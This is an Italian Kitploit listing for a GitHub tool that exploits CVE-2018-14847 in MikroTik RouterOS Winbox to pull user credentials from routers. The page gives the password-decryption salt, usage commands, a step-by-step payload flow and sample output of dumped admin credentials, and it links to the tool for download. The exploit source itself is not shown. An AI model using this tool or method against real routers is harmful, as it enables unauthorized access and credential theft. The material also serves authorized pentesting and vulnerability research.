Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERABILE CVE-2018-14847 - CREDENZIALI ESTRATTE MIKROTIK IN PYTHON | Kitploit
Strumenti/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
Sicurezza IoTAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSicurezza di ReteRed Teaming
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERABILE CVE-2018-14847 - CREDENZIALI ESTRATTE MIKROTIK IN PYTHON

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
13 mesi faNon ancora revisionato

Strumenti di Pentest — /rede

Repository di script per audit e test di penetrazione sulle reti. Utilizzare solo su dispositivi con autorizzazione formale.


CVE-2018-14847 — MikroTik Winbox Credential Extractor

Descrizione

Sfrutta la vulnerabilità di lettura file non autenticata nel servizio Winbox di MikroTik RouterOS. L'handler dei file (handler ID 2) non valida l'autenticazione, consentendo a un attaccante esterno di leggere il file user.dat che contiene tutti gli utenti e le password del dispositivo.

Le password sono memorizzate cifrate con XOR utilizzando la chiave MD5(usuario + "283i4jfkai3389"). Lo script esegue la decrittazione automaticamente.

Versioni interessate

BranchVulnerabile fino aVersione corretta
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

Requisiti

  • Python 3.x (senza dipendenze esterne)
  • Porta 8291 (Winbox) accessibile sul bersaglio

Utilizzo

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

Esempi

root@kitploit:~
# Alvo padrão na porta 8291
python3 cve_2018_14847.py 192.168.1.1

# Porta customizada
python3 cve_2018_14847.py 192.168.1.1 --port 8291

Flusso dell'exploit

root@kitploit:~
1. Conecta na porta 8291 (Winbox)
        ↓
2. Envia FIRST_PAYLOAD — abre sessão + solicita /flash/rw/store/user.dat
        ↓
3. Extrai Session ID do byte 38 da resposta
        ↓
4. Injeta Session ID no byte 19 do SECOND_PAYLOAD
        ↓
5. Envia SECOND_PAYLOAD — lê o arquivo user.dat
        ↓
6. Parseia entradas M2 → extrai usuário e senha cifrada
        ↓
7. Descriptografa senha: XOR com MD5(usuario + salt)
        ↓
8. Exibe credenciais e salva em arquivo

Output atteso

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  Unauthenticated File Read + Password Decryption
  Afetado: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  Alvo  : 192.168.1.1:8291
  Data  : 2026-05-20 18:06:58

[*] Conectando em 192.168.1.1:8291 ...
[+] Conectado ao serviço Winbox.
[*] Enviando payload 1 (requisição de arquivo) ...
[+] Resposta recebida (84 bytes). Session ID: 0x35
[*] Enviando payload 2 (leitura do user.dat) ...
[+] Dados recebidos (312 bytes).
[*] Analisando user.dat (257 bytes úteis) ...

═══════════════════════════════════════════════════════
  CREDENCIAIS EXTRAÍDAS
═══════════════════════════════════════════════════════
  Usuário : admin
  Senha   : senha123
  Combo   : admin:senha123
───────────────────────────────────────────────────────
[+] 1 credencial(is) encontrada(s).
[+] Resultado salvo em: mikrotik_1192.168.1.1_20260520_180658.txt

File di output

Il risultato viene salvato automaticamente in:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

Esempio: mikrotik_192.168.1.1_20260520_180658.txt

Contiene: IP del bersaglio, data, CVE, versione interessata e tutte le coppie utente:password.

Riferimenti

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • Scoperta originale: Omid Shojaei (@Dmitriy_area51)
  • Divulgazione: Aprile 2018

Struttura della cartella

root@kitploit:~
/rede/
├── README.md                        # este arquivo
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # relatório de pentest CGNAT
├── pentest_roteador_192.168.2.1.md  # relatório de pentest roteador
└── mikrotik_<IP>_<TIMESTAMP>.txt    # resultados gerados pelo script

AVVISO LEGALE: Questi strumenti sono per uso esclusivo in ambienti autorizzati. L'esecuzione non autorizzata contro sistemi di terze parti è un reato previsto dalla Legge 12.737/2012 (Legge Carolina Dieckmann) e dall'Art. 154-A del Codice Penale Brasiliano.

Scarica lo strumento